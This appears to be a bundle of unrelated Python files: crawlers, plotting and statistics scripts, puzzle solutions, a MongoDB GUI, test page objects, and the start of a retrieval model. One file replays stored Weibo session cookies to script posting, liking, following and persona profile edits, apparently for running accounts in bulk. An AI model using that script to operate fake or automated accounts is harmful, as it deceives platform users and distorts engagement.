{"seq_id":"64026035","text":"import requests\nimport yaml\nfrom field_page import Field\nfrom bs4 import BeautifulSoup\nimport os\nimport csv\n\n'''\n    Crawl each field url from main page.\n    Create a Field object for each field that exists in the requested fields in parameters.\n'''\n\n\nclass Main:\n    def __init__(self, parameters=None):\n        self.baseURL = None\n        self.fields_name = None\n        self.fields = []\n        self.load_variables(parameters)\n        self.crawl_fields()\n\n    def load_variables(self, parameters):\n        if parameters is None:\n            with open('../config') as conf_file:\n                configs = 
yaml.full_load(conf_file)['Crawl']\n self.fields_name = configs['FIELDS']\n self.baseURL = configs['BASEURL']\n self.max_page = configs['MAXPAGE']\n else:\n self.fields_name = parameters.fields\n self.baseURL = parameters.baseURL\n\n def crawl_fields(self):\n fields = {}\n article = requests.get(self.baseURL + '/persian')\n soup = BeautifulSoup(article.content, 'html.parser')\n type_list = soup.find(role='navigation')\n type_list = type_list.find_all('ul')[0]\n for a in type_list.find_all('a'):\n url = a.get('href')\n text = a.get_text()\n if text in self.fields_name:\n max_page = self.max_page[self.fields_name.index(text)]\n self.fields.append(Field(text, url, self.baseURL, max_page))\n\nif not os.path.exists('../data/dataset.csv'):\n with open('../data/dataset.csv', 'w', newline='') as csvfile:\n fieldnames = ['url', 'title', 'headline', 'body']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\nMain()","sub_path":"src/crawler/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65473781","text":"#Author: Alan Izar\r\n#Trying to understand matplotlib and seaborn\r\n\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nnp.random.seed(sum(map(ord,\"aesthetics\")))\r\n\r\ndef sinplot(flip=1):\r\n x = np.linspace(0,14,100)\r\n for i in range(1, 7):\r\n plt.plot(x, np.sin(x + i * 0.5) * (7 - i) * flip)\r\n plt.show()\r\n\r\nsns.set_style(\"white\")\r\n\r\nsinplot()\r\n\r\nwith sns.axes_style(\"darkgrid\"):\r\n plt.subplot(211)\r\n sinplot()\r\nplt.subplot(212)\r\nsinplot(-1)","sub_path":"learningseaborn.py","file_name":"learningseaborn.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258016432","text":"#!/usr/bin/python\n\n# Read a file that contains logging data from electrical power load current sensors.\n# Compute statistics and send to graphing server.\n\n# Usage: statsApp [-f] inFile\n# Arguments:\n# inFile log file or directory to read\n# If a file is specified, the program processes the data in that file and\n# terminates, unless the -f option is specified, in which case it waits for\n# further data to be written to the input file.\n# If a directory is specified, all files in the directory are processed.\n# If a directory is specified and the -f option is specified, only the file\n# in the directory with the newest modified date is processed and the program\n# waits for further data in that file. 
If a new file is subsequently created in\n# the directory, the current file is closed and the new file is opened.\n# Options:\n# -f follow as the input file grows (as in tail -f)\n\n# configuration\ninFileName = \"\"\nfileDate = \"\"\nfollow = False\nreadInterval = .1\n\n# file handles\ninFile = None\n\n# graphite\ngraphiteSocket = None\nmetricsPrefix = \"\"\nmetricsHost = \"\"\nport = 2003\n\nimport os\nimport socket\nimport struct\nimport sys\nimport time\nimport getopt\nimport syslog\nimport datetime\nimport json\nfrom ha import *\n\nlastTime = 0\nlastTimeLog = 0\nstateDict = {\n \"loads.ac.power\": 0.0,\n \"loads.appliance1.power\": 0.0,\n \"loads.appliance2.power\": 0.0,\n \"loads.backhouse.power\": 0.0,\n \"loads.carcharger.power\": 0.0,\n \"loads.cooking.power\": 0.0,\n \"loads.lights.power\": 0.0,\n \"loads.plugs.power\": 0.0,\n \"loads.pool.power\": 0.0,\n \"loads.ac.power\": 0.0,\n \"loads.appliance1.dailyEnergy\": 0.0,\n \"loads.appliance2.dailyEnergy\": 0.0,\n \"loads.backhouse.dailyEnergy\": 0.0,\n \"loads.carcharger.dailyEnergy\": 0.0,\n \"loads.cooking.dailyEnergy\": 0.0,\n \"loads.lights.dailyEnergy\": 0.0,\n \"loads.plugs.dailyEnergy\": 0.0,\n \"loads.pool.dailyEnergy\": 0.0,\n \"loads.stats.power\": 0.0,\n \"loads.stats.dailyEnergy\": 0.0,\n}\n\n# get command line options and arguments\ndef getOpts():\n global follow\n global inDir, inFileName, inFiles\n (opts, args) = getopt.getopt(sys.argv[1:], \"f\")\n try:\n inFileName = args[0]\n if os.path.isdir(inFileName): # a directory was specified\n inDir = inFileName.rstrip(\"/\")+\"/\"\n inFiles = os.listdir(inDir)\n else: # a file was specified\n inDir = \"\"\n inFiles = [inFileName]\n except:\n terminate(1, \"input file must be specified\")\n for opt in opts:\n if opt[0] == \"-f\":\n follow = True\n debug(\"debugStats\", \"inFileName:\", inFileName)\n debug(\"debugStats\", \"follow:\", follow)\n\n# open the specified input file\ndef openInFile(inFileName):\n global inFile, fileDate\n if inFileName == \"stdin\":\n inFile = sys.stdin\n else:\n try:\n debug(\"debugStats\", inFileName)\n inFile = open(inFileName)\n fileDate = inFileName.split(\".\")[0].split(\"-\")[-1]\n fileDate = fileDate[0:4]+\"-\"+fileDate[4:6]+\"-\"+fileDate[6:8]\n except:\n terminate(1, \"Unable to open \"+inFileName)\n\n# close the currently open input file\ndef closeInFile(inFile):\n if inFile:\n debug(\"debugStats\", \"closing\", inFileName)\n inFile.close()\n\n# open the last modified file in the in directory\ndef openLastinFile():\n global inFileName, inDir, inFile\n if inDir != \"\": # directory was specified\n try:\n inFiles = os.listdir(inDir)\n except:\n terminate(1, \"Unable to access directory \"+inDir)\n latestModTime = 0\n # find the name of the file with the largest modified time\n for fileName in inFiles:\n inModTime = os.path.getmtime(inDir+fileName)\n if inModTime > latestModTime:\n latestModTime = inModTime\n latestFileName = inDir+fileName\n if inFileName != latestFileName: # is there a new file?\n closeInFile(inFile)\n inFileName = latestFileName\n openInFile(inFileName)\n zeroDaily()\n else: # just open the specified file the first time this is called\n if not inFile:\n openInFile(inFileName)\n\n# close all files\ndef closeFiles():\n if inFile: inFile.close()\n\ndef terminate(code, msg=\"\"):\n log(\"terminating\", msg)\n sys.exit(code)\n\n# zero the daily totals\ndef zeroDaily():\n global stateDict\n for item in list(stateDict.keys()):\n itemParts = item.split(\".\")\n if itemParts[2] == \"dailyEnergy\":\n stateDict[item] = 0.0\n\n# 
parse input power readings\ndef parseInput(inRec):\n global lastTime, lastTimeLog, stateDict\n try:\n [timeStamp, inDict] = json.loads(inRec)\n timeStamp = int(timeStamp)\n # if timeStamp < 1561332200: return\n # periodically log the time that is being processed\n if timeStamp > lastTimeLog+3600:\n log(\"processing\", time.asctime(time.localtime(timeStamp)))\n lastTimeLog = timeStamp\n if lastTime == 0:\n lastTime = timeStamp\n timeDiff = timeStamp - lastTime\n debug(\"debugStats\", \"input:\", timeStamp, inDict)\n # compute energy consumed since last measurement\n stateDict[\"loads.stats.power\"] = 0.0\n for item in list(stateDict.keys()):\n itemParts = item.split(\".\")\n if itemParts[0] == \"loads\":\n if itemParts[1] != \"stats\":\n if itemParts[2] == \"power\":\n # add to the total power for this period\n stateDict[\"loads.stats.power\"] += stateDict[item]\n # calculate energy consumed since last measurement for this sensor\n energy = stateDict[item] * timeDiff / 3600\n try:\n stateDict[\"loads.\"+itemParts[1]+\".dailyEnergy\"] += energy\n stateDict[\"loads.stats.dailyEnergy\"] += energy\n except KeyError:\n stateDict[\"loads.\"+itemParts[1]+\".dailyEnergy\"] = 0.0\n debug(\"debugStats\", \"energy:\", item, stateDict[item], energy, stateDict[\"loads.\"+itemParts[1]+\".dailyEnergy\"])\n # update the measurements\n for item in list(inDict.keys()):\n itemParts = item.split(\".\")\n if itemParts[0] == \"loads\":\n if itemParts[1] != \"stats\":\n if inDict[item] == None:\n inDict[item] = 0.0\n stateDict[item] = inDict[item]\n debug(\"debugStats\", \"power: \", item, inDict[item])\n debug(\"debugStats\", \"state:\", stateDict)\n lastTime = timeStamp\n except Exception as ex:\n log(\"exception\", str(ex), inRec[0:40])\n\ndef writeGraphite(timeStamp):\n try:\n metricsSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n metricsSocket.connect((metricsHost, port))\n for item in list(stateDict.keys()):\n metric = \"%s.%s %s %d\" % (metricsPrefix, item, str(stateDict[item]), timeStamp)\n debug(\"debugStats\", \"metric:\", metric)\n metricsSocket.send(bytes(metric+\"\\n\", \"utf-8\"))\n except socket.error as exception:\n log(\"sendMetrics\", \"socket error\", str(exception))\n if metricsSocket:\n metricsSocket.close()\n return\n\nif __name__ == \"__main__\":\n getOpts()\n graphiteSocket = True # openGraphite(hostName, port)\n # process the input file(s)\n if follow: # following - start\n # open the latest input file in the in directory\n openLastinFile()\n while True: # read forever\n inRec = inFile.readline()\n if inRec:\n # sometimes readline doesn't get everything\n # if the read didn't get the whole line, read more\n while inRec[-1] != \"\\n\":\n time.sleep(readInterval)\n debug(\"debugStats\", \"read again\")\n inRec += inFile.readline()\n parseInput(inRec)\n writeGraphite(lastTime)\n else: # end of file - see if a new file has been opened before trying again\n openLastinFile()\n time.sleep(readInterval)\n else: # not following - process whatever files were specified and exit\n for inFileName in inFiles:\n debug(\"debugStats\", \"reading:\", inDir+inFileName)\n openInFile(inDir+inFileName)\n inRec = inFile.readline()\n while inRec:\n parseInput(inRec)\n writeGraphite(lastTime)\n inRec = inFile.readline()\n closeInFile(inFile)\n closeFiles()\n terminate(0, \"Done\")\n","sub_path":"statsApp.py","file_name":"statsApp.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"604600037","text":"# 
-*- coding:utf-8 -*-\nimport pickle\nimport json\nimport requests\nimport re\n\nclass WeiboOpWithCoocie:\n    def get_headers_edit(self, cookies):\n        headers = {\n            \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n            \"Accept-Encoding\": \"gzip,deflate,br\",\n            \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n            \"Connection\": \"keep-alive\",\n            \"Host\": \"account.weibo.com\",\n            \"Referer\": \"https://account.weibo.com/set/iframe?skin=skin048\",\n            \"Upgrade-Insecure - Requests\": \"1\",\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36\",\n        }\n\n        cookie = \"\"\n        for c in cookies:\n            cookie = \"%s;%s=%s\" % (cookie, c[\"name\"], c[\"value\"])\n        headers[\"Cookie\"] = cookie[1:] # strip the leading semicolon\n        print(json.dumps(cookies, indent=2))\n        return headers\n\n    def get_headers_post(self, cookies):\n        headers = {\n            \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n            \"Accept-Encoding\": \"gzip,deflate,br\",\n            \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n            \"Connection\": \"keep-alive\",\n            \"Host\": \"weibo.com\",\n            \"Referer\": \"https://weibo.com\",\n            \"Upgrade-Insecure - Requests\": \"1\",\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36\",\n        }\n\n        cookie = \"\"\n        for c in cookies:\n            cookie = \"%s;%s=%s\" % (cookie, c[\"name\"], c[\"value\"])\n        headers[\"Cookie\"] = cookie[1:] # strip the leading semicolon\n        return headers\n\n    # Edit basic profile info; not working yet - unknown parameter rid\n    def edit_info(self, cookies):\n        headers = self.get_headers_edit(cookies)\n        payload = {\n            'setting_rid': 'd1Vlf235Q-LBj/DshHM8stx-1GQ=',\n            'nickname': '睡小迪_爱琪琪阿四',\n            'realname': '薛梦雪',\n            'gender': 'f',\n            'sextrend[]': '0',\n            'blog': '',\n            'mydesc': '一心一意',\n            'province': '11',\n            'city': '1',\n            'love': '',\n            'Date_Year': '1998',\n            'birthday_m': '03',\n            'birthday_d': '06',\n            'blood': '',\n            'pub_name': '0',\n            'pub_sextrend': '0',\n            'pub_love': '1',\n            'pub_birthday': '3',\n            'pub_blood': '1',\n            'pub_blog': '2',\n        }\n        res = requests.post(\"https://account.weibo.com/set/aj/iframe/editinfo\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"edit_info success!\")\n            return True\n        else:\n            print(\"edit_info fail... \" + res['msg'])\n            return False\n\n    # Edit education info\n    def edit_edu(self, cookies):\n        headers = self.get_headers_edit(cookies)\n        payload = {'name': '北京外国语大学',\n                   'school_type': '1',\n                   'start': '1995',\n                   'privacy': '2',\n                   'school_province': '11',\n                   'school_id': '243973',\n                   }\n\n        res = requests.post(\"https://account.weibo.com/set/aj/iframe/edupost\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"edit_edu success!\")\n            return True\n        else:\n            print(\"edit_edu fail... \" + res['msg'])\n            return False\n\n    # Post a text-only weibo\n    def post(self, text, cookies):\n        headers = self.get_headers_post(cookies)\n\n        payload = {\n            'text': text,\n            'appkey': '', \n            'style_type': '1', \n            'pic_id': '', \n            'tid': '', \n            'pdetail': '', \n            'rank': '0', \n            'rankid': '', \n            'module': 'stissue', \n            'pub_source': 'main_', \n            'pub_type': 'dialog', \n            'isPri': '0', \n            '_t': '0', \n        }\n        res = requests.post(\"https://weibo.com/aj/mblog/add\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"post blog success!\")\n            return True\n        else:\n            print(\"post blog fail... \" + res['msg'])\n            return False\n    \n    # Like a weibo post\n    def like_blog(self, blog_mid, cookies):\n        headers = self.get_headers_post(cookies)\n        payload = {\n            'version': ' mini',\n            'qid': ' heart', \n            'mid': blog_mid,\n            'loc': ' profile', \n            'cuslike': ' 1', \n            '_t': ' 0', \n        }\n        res = requests.post(\"https://weibo.com/aj/v6/like/add\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"like_blog success!\")\n            return True\n        else:\n            print(\"like_blog fail... \" + res['msg'])\n            return False\n\n    #\n    def like_object(self, ob_id, ob_type, cookies):\n        headers = self.get_headers_post(cookies)\n        payload = {\n            'object_id': ob_id,\n            'object_type': ob_type,\n            '_t': '0',\n        }\n        res = requests.post(\"https://weibo.com/aj/v6/like/objectlike\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"like_object(%s) success!\" % (ob_type))\n            return True\n        else:\n            print(\"like_object(%s) fail... \" % (ob_type) + res['msg'])\n            return False\n\n    # Like a comment (to surface someone / grab a hot spot)\n    def like_comment(self, comment_id, cookies):\n        self.like_object(comment_id, \"comment\", cookies)\n\n    # Comment and repost\n    def comment_forward(self, blog_mid, uid, content, forward, cookies):\n        headers = self.get_headers_post(cookies)\n        payload = {\n            'act': 'post', \n            'mid': blog_mid,\n            'uid': uid,\n            'forward': forward,\n            'isroot': '0', \n            'content': content,\n            'module': 'scommlist',\n            'group_source': '', \n            '_t': '0',\n        }\n        res = requests.post(\"https://weibo.com/aj/v6/comment/add\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"comment_forward success!\")\n            return True\n        else:\n            print(\"comment_forward fail... \" + res['msg'])\n            return False\n\n    # Delete a weibo post\n    def del_blog(self, blog_mid, cookies):\n        headers = self.get_headers_post(cookies)\n        payload = {\n            'mid': blog_mid,\n        }\n        res = requests.post(\"https://weibo.com/aj/mblog/del\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"del_blog success!\")\n            return True\n        else:\n            print(\"del_blog fail... \" + res['msg'])\n            return False\n\n    # Delete a comment on a weibo post\n    def del_comment(self, blog_mid, comment_id, uid, cookies):\n        headers = self.get_headers_post(cookies)\n        payload = {\n            'act': 'delete', \n            'mid': blog_mid,\n            'cid': comment_id,\n            'uid': uid,\n            'is_block': '0', \n            'rid': comment_id,\n            'oid': '', \n            '_t': '0', \n        }\n        res = requests.post(\"https://weibo.com/aj/comment/del\", headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"del_comment success!\")\n            return True\n        else:\n            print(\"del_comment fail... \" + res['msg'])\n            return False\n\n    # Follow and unfollow\n    def follow_unfo(self, object_uid, follow, cookies):\n        headers = self.get_headers_post(cookies)\n        payload = {\n            'uid': object_uid,\n            'refer_flag': '1005050002',\n            'oid': object_uid,\n            'wforce': '1', \n            'nogroup': 'false', \n            'refer_from': 'profile_headerv6',\n            '_t': '0', \n        }\n        if follow == \"1\":\n            follow = \"followed\"\n        elif follow == \"0\":\n            follow = \"unfollow\"\n\n        res = requests.post(\"https://weibo.com/aj/f/%s\" % (follow), headers=headers, data=payload).text\n        res = json.loads(res)\n        if res['code'] == '100000':\n            print(\"follow_unfo success!\")\n            return True\n        else:\n            print(\"follow_unfo fail... \" + res['msg'])\n            return False\n\n    def home(self, uid, cookies):\n        headers = self.get_headers_post(cookies)\n        print(requests.get(\"https://weibo.com/u/%s/home\" % (uid), headers=headers).text)\n\n    def get_uid(self, cookies):\n        uid = \"\"\n        for c in cookies:\n            match_ob = re.match(\"wb_cusLike_([0-9]*)\", c['name'])\n            if match_ob is not None:\n                uid = match_ob.group(1)\n        if uid != \"\":\n            print(uid)\n        else:\n            print(u\"Error: could not get uid from cookies...\")\n        return uid\n\nif __name__ == \"__main__\":\n    cookies = pickle.load(open(\"./co_182\", \"rb\"))\n    wbop = WeiboOpWithCoocie()\n    # wbop.del_comment(\"4196497862202988\", \"4196499850359603\", wbop.get_uid(cookies), cookies)\n    wbop.follow_unfo(\"6219737121\", \"1\", cookies)\n    # wbop.comment_forward(\"4196060278136857\", wbop.get_uid(cookies), u\"好暖呢\", \"1\", cookies)\n    # headers = wbop.like_comment(\"4196488429169417\", co)","sub_path":"weibo/weibo_op_cookie.py","file_name":"weibo_op_cookie.py","file_ext":"py","file_size_in_byte":9575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"417648876","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCollect entries from feeds\n\"\"\"\nimport html\nimport feedparser\nfrom bs4 import BeautifulSoup\n\nimport dbmanager\n\n\nclass RssScraper:\n    def __init__(self):\n        \"\"\"\n        Initialization\n\n        Connects to the DB\n        \"\"\"\n        self.dbManager = dbmanager.DbManager()\n\n    def save_entries(self):\n        \"\"\"\n        Collect entries\n\n        Returns\n        -------\n        count : int\n            number of entries collected\n        \"\"\"\n        feeds = self.dbManager.get_feed_list()\n        count = 0\n\n        for feed in feeds:\n            feedId = feed['id']\n            userId = feed['user_id']\n            feedUrl = feed['feedUrl']\n\n            recentUpdated = self.dbManager.search_recent_updated(feedId, userId)\n\n            feed = feedparser.parse(feedUrl)\n            for entry in feed.entries:\n                update = dbmanager.parse_date(entry.updated)\n\n                if update <= recentUpdated:\n                    continue\n\n                soup = BeautifulSoup(entry.summary, \"html.parser\")\n                text = html.escape(soup.get_text())\n\n                query = 'INSERT INTO entries '\\\n                    '(feed_id, user_id, entry_title, entry_url, summary, updated) '\\\n                    'VALUES (%s, %s, %s, %s, %s, %s)'\n\n                self.dbManager.execute_query(\n                    query,\n                    feedId,\n                    userId,\n                    entry.title,\n                    entry.link,\n                    text[:200] + \"...\",\n                    update\n                )\n                count = count + 1\n\n        return count\n\n\nif __name__ == '__main__':\n    RssScraper().save_entries()\n","sub_path":"web/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"588474389","text":"#!/usr/bin/env python3\n\ndef process(outlets, devices, l, flip):\n    if l == len(devices[0]):\n        outlets_s = [x.decode('utf-8') for x in outlets]\n        devices_s = [x.decode('utf-8') for x in devices]\n        outlets_s.sort()\n        if outlets_s == devices_s:\n            return flip\n        else:\n            return None\n    if l != 0:\n        outlets_s = [x[:l].decode('utf-8') for x in outlets]\n        devices_s = [x[:l].decode('utf-8') for x in devices]\n        outlets_s.sort()\n        if outlets_s != devices_s:\n            return None\n    required_zeros = [x[l] for x in devices].count(48)\n    has_zeros = [x[l] for x in outlets].count(48)\n    retval1 = retval2 = 999\n    if required_zeros == has_zeros:\n        retval1 = process(outlets, devices, l+1, flip)\n        if retval1 is None:\n            retval1 = 999\n    if required_zeros + has_zeros == len(devices):\n        for o in outlets:\n            if o[l] == 49:\n                o[l] = 48\n            else:\n                o[l] = 49\n        retval2 = process(outlets, devices, l+1, flip+1)\n        if retval2 is None:\n            retval2 = 999\n        for o in outlets:\n            if o[l] == 49:\n                o[l] = 48\n            else:\n                o[l] = 49\n    if retval1 == retval2 and retval2 == 999:\n        return None\n    else:\n        return min(retval1, retval2)\n\nT = int(input())\nfor case in range(1, T+1):\n    input()\n    outlets = [bytearray(s, 'utf-8') for s in input().split()]\n    devices = [bytearray(s, 'utf-8') for s in input().split()]\n    devices.sort()\n    retval = process(outlets, devices, 0, 0)\n    print('Case #{0}: {1}'.format(case, retval if retval is not None else 'NOT POSSIBLE'))\n","sub_path":"solutions_5634947029139456_1/Python/pinkplus/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"184073727","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\n'''\n    • Complexity\n        ○ O(nlogk) - n being length, k being # of lists\n    • Topics\n        ○ linkedlist\nRun merge2 log(k) times. Note how the final merge order is written - a crappier version could simply build a new list on each pass.\n'''\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n        def merge2(l1: ListNode, l2: ListNode):\n            if not l1: return l2\n            if not l2: return l1\n\n            dummy = ListNode(None)\n            curr = dummy\n            while l1 and l2:\n                if l1.val < l2.val:\n                    curr.next = l1\n                    l1 = l1.next\n                else:\n                    curr.next = l2\n                    l2 = l2.next\n                curr = curr.next\n            curr.next = l1 if l1 else l2 \n            return dummy.next\n        \n        # Edge case handling\n        if not lists: return None\n\n        # in-place\n        length = len(lists)\n        # Current interval\n        interval = 1\n        while interval < length:\n            # Amount - interval makes sure last pair has a distance of interval in between\n            for i in range(0, length - interval, interval * 2):\n                lists[i] = merge2(lists[i], lists[i + interval])\n            interval *= 2\n        return lists[0]\n        '''\n        # Crappy merge (not in place)\n        curr = lists\n        while len(curr) > 1:\n            li = []\n            # Actually similar to in-place solution\n            for i in range(0, len(curr) - 1, 2):\n                li.append(merge2(curr[i], curr[i + 1]))\n            # Append the last one if odd\n            if len(curr) % 2 == 1:\n                li.append(curr[-1])\n            curr = li\n        return curr[0]\n        '''","sub_path":"leetcode/23_merge_k_sorted_lists.py","file_name":"23_merge_k_sorted_lists.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"449710520","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter.ttk import Combobox\nfrom Mongo import Mongo\n\n\nclass FieldWindow(Frame):\n    def __init__(self, parent, controller):\n        Frame.__init__(self, parent)\n        self.controller = controller\n        self.bind(\"<>\", self.onShowFrame)\n        mongo = Mongo()\n\n        def selectedDocument(event):\n            Mongo.setDocument(mongo, self.comboboxDocument.current())\n            fields = Mongo.getFields(mongo)\n            self.comboboxField.config(values=fields)\n            self.comboboxField.current(0)\n\n        def nextFrame(field):\n            Mongo.setField(mongo, field)\n            dataType = Mongo.getFieldDataType(mongo)\n            if dataType == 'string':\n                self.controller.showFrame(\"StringLengthWindow\")\n            elif dataType == 'int' or dataType == 'double' or dataType == 'long' or dataType == 'decimal':\n                self.controller.showFrame(\"NumberIntervalWindow\")\n            else:\n                messagebox.showerror(\"Error\", \"Selected field must be a number or string data type\")\n\n        labelDocument = Label(self, text=\"Select document:\")\n        labelDocument.grid(row=0, column=0, padx=5, pady=5, sticky=\"W\")\n\n        self.comboboxDocument = Combobox(self, state=\"readonly\")\n        
self.comboboxDocument.bind(\"<>\", selectedDocument)\n self.comboboxDocument.grid(row=0, column=1, padx=5, pady=5)\n\n labelField = Label(self, text=\"Select field:\")\n labelField.grid(row=1, column=0, padx=5, pady=5, sticky=\"W\")\n\n self.comboboxField = Combobox(self, state=\"readonly\")\n self.comboboxField.grid(row=1, column=1, padx=5, pady=5)\n\n buttonBack = Button(self, text=\"Back\", command=lambda: controller.showFrame(\"StartWindow\"))\n buttonBack.grid(row=2, column=0, padx=5, pady=5, sticky=\"W\")\n\n buttonConfirm = Button(self, text=\"Confirm\", command=lambda: nextFrame(self.comboboxField.get()))\n buttonConfirm.grid(row=2, column=1, padx=5, pady=5, sticky=\"E\")\n\n def onShowFrame(self, event):\n try:\n mongo = Mongo()\n\n documentsID = Mongo.getDocumentsID(mongo)\n self.comboboxDocument.config(values=documentsID)\n self.comboboxDocument.current(0)\n Mongo.setDocument(mongo, self.comboboxDocument.current())\n\n fields = Mongo.getFields(mongo)\n self.comboboxField.config(values=fields)\n self.comboboxField.current(0)\n Mongo.setField(mongo, self.comboboxField.get())\n\n except IndexError:\n messagebox.showerror(\"Error\", \"Collection has no data\")\n self.controller.showFrame(\"StartWindow\")\n\n except:\n messagebox.showerror(\"Error\", \"Unexpected error\")\n","sub_path":"FieldWindow.py","file_name":"FieldWindow.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"75080449","text":"from .base_page import BasePage\nfrom .locators import ProductPageLocators\n\n\nclass ProductPage(BasePage):\n def add_product_to_basket(self):\n button = self.browser.find_element(*ProductPageLocators.ADD_TO_BASKET_BUTTON)\n button.click()\n self.solve_quiz_and_get_code()\n name_good = self.browser.find_element(*ProductPageLocators.NAME_GOOD).text\n price_good = self.browser.find_element(*ProductPageLocators.PRICE_GOOD).text\n name_good_in_basket = self.browser.find_element(*ProductPageLocators.NAME_GOOD_BASKET).text\n price_good_in_basket = self.browser.find_element(*ProductPageLocators.PRICE_GOOD_BASKET).text\n assert name_good == name_good_in_basket, \"This product isn't in basket\"\n assert price_good == price_good_in_basket, \"The basket amount is not equal price of product\"\n\n def should_not_be_success_message(self):\n assert self.is_not_element_present(*ProductPageLocators.SUCCESS_MESSAGE), \"Success message is presented,\" \\\n \" but should not be\"\n\n def should_disappeared_success_message(self):\n assert self.is_disappeared(*ProductPageLocators.SUCCESS_MESSAGE), \"Success message is not disappeared\"\n","sub_path":"pages/product_page.py","file_name":"product_page.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505192781","text":"from __future__ import print_function\nimport os, time, cPickle\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom random import shuffle\nfrom scipy.spatial.distance import *\nimport sklearn.preprocessing\nfrom base_model import BaseModel, BaseModelParams, BaseDataIter\nimport utils\nfrom flip_gradient import flip_gradient\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nclass DataIter(BaseDataIter):\n def __init__(self, batch_size):\n BaseDataIter.__init__(self, batch_size)\n self.num_train_batch = 0\n self.num_test_batch = 0\n\n with open('./data/pascal/data/train_img_feats.pkl', 'rb') as f:\n 
self.train_img_feats = cPickle.load(f)\n with open('./data/pascal/data/train_txt_vecs.pkl', 'rb') as f:\n self.train_txt_vecs = cPickle.load(f)\n with open('./data/pascal/data/train_labels.pkl', 'rb') as f:\n self.train_labels = cPickle.load(f)\n with open('./data/pascal/data/test_img_feats.pkl', 'rb') as f:\n self.test_img_feats = cPickle.load(f)\n with open('./data/pascal/data/test_txt_vecs.pkl', 'rb') as f:\n self.test_txt_vecs = cPickle.load(f)\n with open('./data/pascal/data/test_labels.pkl', 'rb') as f:\n self.test_labels = cPickle.load(f)\n\n print(len(self.train_img_feats))\n print(len(self.test_img_feats))\n \n \n self.num_train_batch = len(self.train_img_feats) / self.batch_size\n self.num_test_batch = len(self.test_img_feats) / self.batch_size\n\n def train_data(self):\n for i in range(self.num_train_batch):\n batch_img_feats = self.train_img_feats[i*self.batch_size : (i+1)*self.batch_size]\n batch_txt_vecs = self.train_txt_vecs[i*self.batch_size : (i+1)*self.batch_size]\n batch_labels = self.train_labels[i*self.batch_size : (i+1)*self.batch_size]\n yield batch_img_feats, batch_txt_vecs, batch_labels, i\n\n def test_data(self):\n for i in range(self.num_test_batch):\n batch_img_feats = self.test_img_feats[i*self.batch_size : (i+1)*self.batch_size]\n batch_txt_vecs = self.test_txt_vecs[i*self.batch_size : (i+1)*self.batch_size]\n batch_labels = self.test_labels[i*self.batch_size : (i+1)*self.batch_size]\n yield batch_img_feats, batch_txt_vecs, batch_labels, i\n\n\nclass ModelParams(BaseModelParams):\n def __init__(self):\n BaseModelParams.__init__(self)\n self.n_save_epoch = 10\n self.n_max_save = 10\n self.r_domain = 1.0\n self.r_pair = 0.1\n self.n_class = 20\n\n self.epoch = 100\n self.margin = .1\n self.alpha = 5\n self.batch_size = 40\n self.visual_feat_dim = 4096\n #self.word_vec_dim = 300\n self.word_vec_dim = 1000\n self.lr_total = 0.0001\n self.lr_emb = 0.0001\n self.lr_domain = 0.0001\n self.lr_pair = 0.0001\n self.top_k = 50\n self.semantic_emb_dim = 200\n self.dataset_name = 'wikipedia_dataset'\n self.model_name = 'adv_semantic_zsl'\n self.model_dir = 